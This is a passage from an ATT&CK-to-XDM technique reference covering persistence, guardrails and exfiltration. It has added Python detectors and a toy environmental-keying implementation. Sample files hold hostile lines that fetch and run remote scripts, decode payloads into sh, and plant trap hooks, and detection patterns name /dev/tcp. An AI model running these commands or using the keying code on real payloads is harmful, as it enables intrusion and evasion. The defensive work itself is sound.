and host programs on the local computer. (Citation: Microsoft About Profiles) Adversaries may modify these
profiles to include arbitrary commands, functions, modules, and/or
[PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user
opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be
executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May
2019) An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and
executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and
Shady PowerShell Profiles) https://attack.mitre.org/techniques/T1546/013
T1546.002 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_SCREENSAVER Adversaries may establish persistence by executing malicious content triggered by user inactivity.
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable
Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver
application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit
Windows systems, along with screensavers included with base Windows installations. The following
screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be
manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set
to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock *
ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use
screensaver settings to maintain persistence by setting the screensaver to run malware after a certain
timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) https://attack.mitre.org/techniques/T1546/002
T1546.005 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_TRAP Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The
trap command allows programs and shells to specify commands that will be executed upon receiving
interrupt signals. A common situation is a script allowing for graceful termination and handling of common
keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when
the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following
format trap 'command list' signals where "command list" will be executed when "signals" are
received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) https://attack.mitre.org/techniques/
T1546/005
T1546.004 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_UNIX_SHELL_CONFIGURATION_MODIFICATION Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.
User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at
different points throughout the session based on events. For example, when a user opens a command-line
interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from
the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a
system use /etc/profile when initiated. These configuration scripts run at the permission level of their
directory and are often used to set environment variables, create aliases, and customize the user’s
environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell
exits appropriately. Adversaries may attempt to establish persistence by inserting commands into scripts
automatically executed by shells. Using bash, the default shell on most GNU/Linux systems, as an example,
adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/
profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require
root permissions to modify and are executed each time any shell on a system launches. For user level
permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or
~/.profile which are sourced when a user opens a command-line interface or connects remotely.
(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes
the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution.
Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is
established remotely or an additional interactive shell is opened, such as a new tab in the command-line
interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation:
Magento) Some malware targets the termination of a program to trigger execution; adversaries can use the
~/.bash_logout file to execute malicious commands at the end of a session. For macOS, the functionality
of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the
Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login
shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/
zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)
(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with
~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment.
Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/
bashrc on startup. https://attack.mitre.org/techniques/T1546/004
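The two rows above (T1546.004 and T1546.005) describe which shell startup and exit files run at which point in a session and the trap 'command list' signals form. The following is an added example, not code from this page or from XSIAM: a small auditor that takes a set of shell configuration files, labels each with the shell event that sources it (the table follows the bash/zsh behaviour described in the text), and flags lines a responder would want to read, including trap handlers. The file contents are constructed, and the indicator patterns are this editor's assumptions rather than a vendor rule set.

```python
"""Audit shell startup and exit scripts for the two persistence hooks
described above: commands planted in the files a login/interactive shell
sources (T1546.004) and trap handlers that fire on signals or exit
(T1546.005).  Added example; file contents are constructed, the
file-to-trigger table follows the bash/zsh behaviour in the text, and the
indicator patterns are the editor's assumptions, not a vendor rule set."""
import re
from typing import Dict, List, NamedTuple

# Which shell event sources each file.  /etc entries normally need root.
TRIGGERS = {
    "/etc/profile":    "login shell start (all users)",
    "/etc/profile.d/": "login shell start (all users)",
    "/etc/bashrc":     "bash start (macOS legacy bash)",
    "/etc/zshenv":     "every zsh start (all users)",
    "/etc/zprofile":   "zsh login shell start (all users)",
    "/etc/zlogin":     "zsh login shell start (all users)",
    "/etc/zlogout":    "zsh exit (all users)",
    "~/.bash_profile": "bash login shell start (first existing file wins)",
    "~/.bash_login":   "bash login shell start (if no .bash_profile)",
    "~/.profile":      "login shell start (if neither file above exists)",
    "~/.bashrc":       "bash interactive shell start",
    "~/.bash_logout":  "bash login shell exit",
    "~/.zprofile":     "zsh login shell start",
    "~/.zlogin":       "zsh login shell start",
    "~/.zshrc":        "zsh interactive shell start",
    "~/.zlogout":      "zsh exit",
}

# Lines worth a human look.  Order matters: first match wins.
INDICATORS = [
    (re.compile(r"""\btrap\s+(['"]).+?\1\s+[A-Za-z0-9 ]+$"""), "trap handler registered"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),          "download piped to a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"),                  "base64-decoded payload"),
    (re.compile(r"/dev/tcp/"),                                    "bash network redirection"),
    (re.compile(r"\bnohup\b.*&\s*$"),                             "detached background process"),
]


class Finding(NamedTuple):
    file: str
    trigger: str
    line_no: int
    line: str
    reason: str


def trigger_for(path: str) -> str:
    """Shell event that sources this file, or 'unknown' for non-standard files."""
    for prefix, trigger in TRIGGERS.items():
        if path == prefix or (prefix.endswith("/") and path.startswith(prefix)):
            return trigger
    return "unknown (not a standard startup file)"


def audit(files: Dict[str, str]) -> List[Finding]:
    """Scan {path: contents}; comments and blank lines are skipped."""
    findings: List[Finding] = []
    for path, content in files.items():
        trigger = trigger_for(path)
        for n, raw in enumerate(content.splitlines(), 1):
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            for pattern, reason in INDICATORS:
                if pattern.search(line):
                    findings.append(Finding(path, trigger, n, line, reason))
                    break
    return findings


# Constructed file contents (paths use ~ for the user's home).
SAMPLE_FILES = {
    "~/.bashrc": "# .bashrc\nalias ll='ls -l'\nexport PATH=$PATH:~/bin\n"
                 "curl -s http://example.invalid/a.sh | bash\n",
    "~/.bash_profile": "trap 'nohup /tmp/.x >/dev/null 2>&1 &' EXIT INT\n"
                       "[ -f ~/.bashrc ] && . ~/.bashrc\n",
    "/etc/profile.d/99-update.sh": "echo aGVsbG8= | base64 -d | sh\n",
    "~/.zshrc": "autoload -Uz compinit && compinit\n",
}

if __name__ == "__main__":
    for f in audit(SAMPLE_FILES):
        print(f"{f.file}:{f.line_no} [{f.trigger}] {f.reason}: {f.line}")
```

The trigger label is the useful part for triage: a finding in ~/.bash_profile fires once per login, while one in ~/.bashrc fires on every new interactive shell, and a trap on EXIT in either only runs when that shell ends, which is why the text singles out ~/.bash_logout and the trap builtin as exit-time hooks.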
T1546.003 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a
Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters,
providers, consumers, and bindings that execute code when a defined event occurs. Examples of events
that may be subscribed to are the wall clock time, user login, or the computer's uptime. (Citation: Mandiant
M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary
code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015)
(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object
(MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI
Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI
Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. https://
attack.mitre.org/techniques/T1546/003
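The four Windows rows in this group (T1546.007 netsh helper DLLs, T1546.013 PowerShell profiles, T1546.002 screensaver settings, T1546.003 WMI event subscriptions) each name a concrete on-disk or registry artifact. The following is an added example, not XSIAM code or part of this page: a classifier that takes observed artifacts and returns the XDM_CONST technique constant listed above, which is the value a normalizing parser would place in a MITRE technique field. The artifact records are constructed; the stock screensaver directories come from the T1546.002 text, and it is an assumption that a sensor reports WMI subscription objects by class name (__EventFilter, __FilterToConsumerBinding, CommandLineEventConsumer, ActiveScriptEventConsumer).

```python
"""Map Windows persistence artifacts onto the XDM MITRE technique constants
listed on this page.  Added example: the artifact records below are
constructed for illustration, not real telemetry."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

NETSH_HELPER = "XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_NETSH_HELPER_DLL"
PS_PROFILE = "XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_POWERSHELL_PROFILE"
SCREENSAVER = "XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_SCREENSAVER"
WMI_SUBSCRIPTION = ("XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_"
                    "WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION")

# Directories in which the stock screensavers live (per the T1546.002 text).
TRUSTED_SCR_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# WMI classes whose creation is part of a permanent event subscription
# (assumed to be reported by class name by the collecting sensor).
WMI_SUBSCRIPTION_CLASSES = {"__eventfilter", "__filtertoconsumerbinding",
                            "commandlineeventconsumer", "activescripteventconsumer"}


@dataclass
class Artifact:
    kind: str        # "registry", "file" or "wmi"
    path: str        # registry key, file path, or WMI class name
    name: str = ""   # registry value name (registry artifacts only)
    data: str = ""   # registry value data (registry artifacts only)


def _norm(p: str) -> str:
    """Case-fold and use backslashes so hive/path prefixes compare reliably."""
    return p.replace("/", "\\").lower().strip('"')


def classify(a: Artifact) -> Optional[str]:
    """Return the technique constant an artifact maps to, or None if benign."""
    path = _norm(a.path)
    if a.kind == "registry":
        if path.startswith("hklm\\software\\microsoft\\netsh"):
            return NETSH_HELPER            # any new helper DLL registration
        if path.startswith("hkcu\\control panel\\desktop") \
                and a.name.lower() == "scrnsave.exe":
            # Only a saver outside the stock directories is suspicious;
            # ScreenSaveActive / ScreenSaverIsSecure / ScreenSaveTimeout are
            # supporting evidence and are not classified on their own.
            if not _norm(a.data).startswith(TRUSTED_SCR_DIRS):
                return SCREENSAVER
        return None
    if a.kind == "file":
        # profile.ps1 and the host-specific *_profile.ps1 variants
        return PS_PROFILE if path.endswith("profile.ps1") else None
    if a.kind == "wmi":
        return WMI_SUBSCRIPTION if path in WMI_SUBSCRIPTION_CLASSES else None
    return None


def classify_all(artifacts: List[Artifact]) -> List[Tuple[str, str]]:
    """(artifact path, technique constant) for every artifact that matched."""
    hits = []
    for a in artifacts:
        technique = classify(a)
        if technique:
            hits.append((a.path, technique))
    return hits


# Constructed sample artifacts.
SAMPLE = [
    Artifact("registry", r"HKLM\SOFTWARE\Microsoft\Netsh", "helper", r"C:\Users\Public\helper.dll"),
    Artifact("registry", r"HKCU\Control Panel\Desktop", "SCRNSAVE.EXE", r"C:\Users\Public\update.scr"),
    Artifact("registry", r"HKCU\Control Panel\Desktop", "SCRNSAVE.EXE", r"C:\Windows\System32\Bubbles.scr"),
    Artifact("file", r"C:\Users\alice\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1"),
    Artifact("wmi", "__FilterToConsumerBinding"),
    Artifact("file", r"C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    for path, technique in classify_all(SAMPLE):
        print(f"{technique}\t{path}")
```

The screensaver branch deliberately ignores ScreenSaveActive, ScreenSaverIsSecure and ScreenSaveTimeout: those values are legitimately written by users and Group Policy, so on their own they only say that a screensaver will run, while SCRNSAVE.EXE pointing outside the stock directories says what will run.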
T1480 XDM_CONST.MITRE_TECHNIQUE_EXECUTION_GUARDRAILS Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied
and environment specific conditions that are expected to be present on the target. Guardrails ensure that a
payload only executes against an intended target and reduces collateral damage from an adversary’s
campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target
system or environment to use as guardrails may include specific network share names, attached physical
devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye
Outlook Dec 2019) Guardrails can be used to prevent exposure of capabilities in environments that are not
intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/
Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion]
(https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing
with execution only if there is no match, the use of guardrails will involve checking for an expected target-
specific value and only continuing with execution if there is such a match. https://attack.mitre.org/
techniques/T1480
T1480.001 XDM_CONST.MITRE_TECHNIQUE_EXECUTION_GUARDRAILS_ENVIRONMENTAL_KEYING Adversaries may environmentally key payloads or other features of malware to evade defenses and
constrain execution to a specific target environment. Environmental keying uses cryptography to constrain
execution or actions based on adversary supplied environment specific conditions that are expected to be
present on the target. Environmental keying is an implementation of [Execution Guardrails](https://
attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption
keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values
can be derived from target-specific elements and used to generate a decryption key for an encrypted
payload. Target-specific values can be derived from specific network shares, physical devices, software/
software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation:
Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware
Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the
decryption keys from target-specific environmental values, environmental keying can make sandbox
detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation:
Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the
incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use
environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to
deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before
execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation:
Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo)
By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption
key with the payload or sending it over a potentially monitored network connection. Depending on the
technique for gathering target-specific values, reverse engineering of the encrypted payload can be
exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) Like other [Execution Guardrails](https://
attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in
environments that are not intended to be compromised or operated within. This activity is distinct from typical
[Virtualization/Sandbox Evasion](https://attack.mitre.org/
techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/
T1497) may involve checking for known sandbox values and continuing with execution only if there is no
match, the use of environmental keying will involve checking for an expected target-specific value that must
match for decryption and subsequent execution to be successful. https://attack.mitre.org/techniques/
T1480/001
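The T1480 and T1480.001 rows above describe the mechanism in words: a key is derived from target-specific values, the payload is encrypted under it, and the key itself is never shipped, so the payload cannot be opened where those values differ. The following is an added illustration, not code from this page or from any real tool, of that derivation and of the analyst-side consequence: to recover such a payload you must reproduce the target's values, which is why the text says sandboxes and reverse engineering are impeded. The stdlib-only XOR-keystream-plus-HMAC construction is a stand-in for a real authenticated cipher, and the hostname, domain and address values are constructed.

```python
"""Environmental keying (T1480.001) as a worked example of the guardrail
idea in T1480: the key that unlocks a payload is derived from facts about the
intended target, so the payload never carries its own key and cannot be
opened in a sandbox whose facts differ.  Added illustration, not code from
any real tool; the XOR-keystream-plus-HMAC construction is a stdlib-only
stand-in for a real authenticated cipher, and all values are constructed."""
import hashlib
import hmac
import os
from typing import Iterable, Optional, Sequence, Tuple

ITERATIONS = 100_000   # slows brute force over guessed environment values


def derive_key(env_values: Sequence[str], salt: bytes) -> bytes:
    """Bind a 256-bit key to concrete environment facts (hostname, domain...)."""
    material = "\x00".join(env_values).encode("utf-8")
    return hashlib.pbkdf2_hmac("sha256", material, salt, ITERATIONS, dklen=32)


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """SHA-256 in counter mode; toy stream cipher for the demonstration."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


def seal(payload: bytes, env_values: Sequence[str],
         salt: Optional[bytes] = None, nonce: Optional[bytes] = None) -> bytes:
    """Encrypt-then-MAC under a key derived from the target's values.
    Output layout: salt(16) | nonce(16) | tag(32) | ciphertext."""
    salt = salt if salt is not None else os.urandom(16)
    nonce = nonce if nonce is not None else os.urandom(16)
    key = derive_key(env_values, salt)
    ct = bytes(p ^ k for p, k in zip(payload, _keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + ct, "sha256").digest()
    return salt + nonce + tag + ct


def unseal(blob: bytes, env_values: Sequence[str]) -> Optional[bytes]:
    """Return the payload only if the environment values reproduce the key;
    a tag mismatch (wrong host) yields None and nothing is executed."""
    salt, nonce, tag, ct = blob[:16], blob[16:32], blob[32:64], blob[64:]
    key = derive_key(env_values, salt)
    expected = hmac.new(key, nonce + ct, "sha256").digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


def recover(blob: bytes, candidates: Iterable[Sequence[str]]
            ) -> Optional[Tuple[Sequence[str], bytes]]:
    """Analyst side: try value sets harvested from the victim environment
    (hostnames, AD domain, external IP) until one validates."""
    for values in candidates:
        payload = unseal(blob, values)
        if payload is not None:
            return values, payload
    return None


# Constructed demonstration values.
TARGET_ENV = ("WS-FIN-0042", "corp.example", "203.0.113.17")
SANDBOX_ENV = ("SANDBOX-01", "WORKGROUP", "10.0.2.15")
DEMO_PAYLOAD = b"stage-2 configuration (constructed placeholder bytes)"

if __name__ == "__main__":
    blob = seal(DEMO_PAYLOAD, TARGET_ENV)
    print("on target :", unseal(blob, TARGET_ENV))
    print("in sandbox:", unseal(blob, SANDBOX_ENV))
    print("recovered :", recover(blob, [SANDBOX_ENV, TARGET_ENV]))
```

Two practical points follow from the code. First, the salt and nonce travel with the blob, so a sample gives an analyst everything except the environment values; recovery therefore depends on collecting the victim's hostname, domain, external address and similar facts alongside the sample, not on the sample alone. Second, the PBKDF2 iteration count is what makes guessing those values expensive, which is the same reason candidate sets should be harvested from the actual environment rather than enumerated.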
T1048 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and
control channel. The data may also be sent to an alternate network location from the main command and
control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol
not being used as the main command and control channel. Different protocol channels could also include
Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate
channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done
using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB
or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols
such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and
Techniques) https://attack.mitre.org/techniques/T1048
T1048.002 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL_EXFILTRATION_OVER_ASYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than
that of the existing command and control channel. The data may also be sent to an alternate network
location from the main command and control server. Asymmetric encryption algorithms are those that use
different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of
cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the
communication channel requires a private key (only in the possession of that entity) and the public key of
the other entity. The public keys of each entity are exchanged before encrypted communications begin.
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric
encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are
baked into a protocol. https://attack.mitre.org/techniques/T1048/002
T1048.001 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL_EXFILTRATION_OVER_SYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that
of the existing command and control channel. The data may also be sent to an alternate network location
from the main command and control server. Symmetric encryption algorithms are those that use shared or
the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/
possession of the value used to encrypt and decrypt data. Network protocols that use asymmetric
encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to
manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using
mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that
are natively encrypted such as HTTPS) or encryption in protocols that are not typically encrypted (such as
HTTP or FTP). https://attack.mitre.org/techniques/T1048/001
T1048.003 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL_EXFILTRATION_OVER_UNENCRYPTED_OBFUSCATED_NON_C2_PROTOCOL Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the
existing command and control channel. The data may also be sent to an alternate network location from the
main command and control server. Adversaries may opt to obfuscate this data, without the use of
encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may
include custom or publicly available encoding/compression algorithms (such as base64) as well as
embedding data within protocol headers and fields. https://attack.mitre.org/techniques/T1048/003
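The T1048 family above, and T1048.003 in particular, describes data that is encoded rather than encrypted and carried in fields of a protocol that is not the C2 channel; DNS is the canonical case, with chunks of data placed in subdomain labels. The following is an added example, not XSIAM detection content or code from this page: it scores DNS query logs per parent domain on the volume of long, high-entropy labels, which is the trait the text describes. The log layout ("epoch client qname qtype"), the thresholds and the sample lines are constructed; the registered domain is assumed to be the last two labels, and the encoded chunks are deterministic stand-ins generated inline.

```python
"""Score DNS query logs for the pattern described for T1048.003: data encoded
(not encrypted) into long, high-entropy subdomain labels, many unique ones
per parent domain.  Added example; log format, thresholds and the sample
lines are constructed/assumed, not taken from any product."""
import base64
import hashlib
import math
from collections import Counter, defaultdict
from typing import Dict, List


def shannon(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or one-symbol string)."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def parent_domain(qname: str) -> str:
    """Registered domain, assumed here to be the last two labels."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze(log: str, min_label: int = 30, min_entropy: float = 3.5,
            min_encoded: int = 5) -> Dict[str, dict]:
    """Per parent domain: query count, unique labels, distinct labels that
    look like encoded data, and whether their number crosses the bar."""
    stats = defaultdict(lambda: {"queries": 0, "labels": set(), "encoded": set()})
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname, _qtype = line.split()   # assumed log layout
        name = qname.rstrip(".")
        dom = parent_domain(name)
        st = stats[dom]
        st["queries"] += 1
        sub = name[:-(len(dom) + 1)] if name != dom else ""
        for label in filter(None, sub.split(".")):
            st["labels"].add(label)
            # A single long random-looking label is common (CDN hosts, tokens);
            # many distinct ones under one domain is the exfiltration signal.
            if len(label) >= min_label and shannon(label) >= min_entropy:
                st["encoded"].add(label)
    return {dom: {"queries": st["queries"],
                  "unique_labels": len(st["labels"]),
                  "encoded_labels": len(st["encoded"]),
                  "suspicious": len(st["encoded"]) >= min_encoded}
            for dom, st in stats.items()}


def _encoded_chunks(n: int) -> List[str]:
    """Deterministic stand-ins for base32-encoded chunks of stolen data."""
    return [base64.b32encode(hashlib.sha256(b"chunk-%d" % i).digest())
            .decode().rstrip("=").lower() for i in range(n)]


def build_sample_log() -> str:
    """Constructed '<epoch> <client> <qname> <qtype>' lines."""
    lines = [
        "1700000000 10.0.0.5 www.example.com A",
        "1700000001 10.0.0.5 mail.example.com MX",
        "1700000002 10.0.0.5 autodiscover.example.com A",
        "1700000003 10.0.0.5 d3k9f1x2c7a8b4e6m0p5q9w2r7t1y4u8.cdn.example A",
    ]
    for i, chunk in enumerate(_encoded_chunks(7)):
        lines.append(f"{1700000010 + i} 10.0.0.9 {chunk}.t.data-tunnel.example TXT")
    return "\n".join(lines)


if __name__ == "__main__":
    for dom, row in analyze(build_sample_log()).items():
        print(dom, row)
```

The per-domain count is the part that keeps the false-positive rate tolerable: one 32-character random-looking label under a CDN domain is scored as encoded but does not make the domain suspicious, whereas seven distinct ones under data-tunnel.example do. The same scoring applies unchanged to HTTP paths or query-string values once they are split into tokens, since the text notes the same encoding trick in HTTP and FTP.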
T1041 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_C2_CHANNEL Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is
encoded into the normal communications channel using the same protocol as command and control
communications. https://attack.mitre.org/techniques/T1041
T1011 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_OTHER_NETWORK_MEDIUM Adversaries may attempt to exfiltrate data over a different network medium than the command and control
channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for
example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency
(RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the
connection might not be secured or defended as well as the primary Internet-connected channel because it
is not routed through the same enterprise network. https://attack.mitre.org/techniques/T1011
T1011.001 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_OTHER_NETWORK_MEDIUM_EXFILTRATION_OVER_BLUETOOTH Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If
the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data
using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access
and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-
connected channel because it is not routed through the same enterprise network. https://attack.mitre.org/
techniques/T1011/001
T1052 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_PHYSICAL_MEDIUM Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain
circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium
or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone,
MP3 player, or other removable storage and processing device. The physical medium or device could be
used as the final exfiltration point or to hop between otherwise disconnected systems. https://
attack.mitre.org/techniques/T1052
T1052.001 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_PHYSICAL_MEDIUM_EXFILTRATION_OVER_USB Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances,
such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user.
The USB device could be used as the final exfiltration point or to hop between otherwise disconnected
systems. https://attack.mitre.org/techniques/T1052/001
T1567 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_WEB_SERVICE Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary
command and control channel. Popular Web services acting as an exfiltration mechanism may give a
significant amount of cover due to the likelihood that hosts within a network are already communicating with
them prior to compromise. Firewall rules may also already exist to permit traffic to these services. Web
service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.
https://attack.mitre.org/techniques/T1567
T1567.002 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_WEB_SERVICE_EXFILTRATION_TO_CLOUD_STORAGE Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and
control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud
storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs.
Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if
hosts within the network are already communicating with the service. https://attack.mitre.org/techniques/
T1567/002
T1567.001 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_WEB_SERVICE_EXFILTRATION_TO_CODE_REPOSITORY Adversaries may exfiltrate data to a code repository rather than over their primary command and control
channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these
APIs are often over HTTPS, which gives the adversary an additional level of protection. Exfiltration to a
code repository can also provide a significant amount of cover to the adversary if it is a popular service
already used by hosts within the network. https://attack.mitre.org/techniques/T1567/001
T1190 XDM_CONST.MITRE_TECHNIQUE_EXPLOIT_PUBLIC_FACING_APPLICATION Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using
software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the
system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can
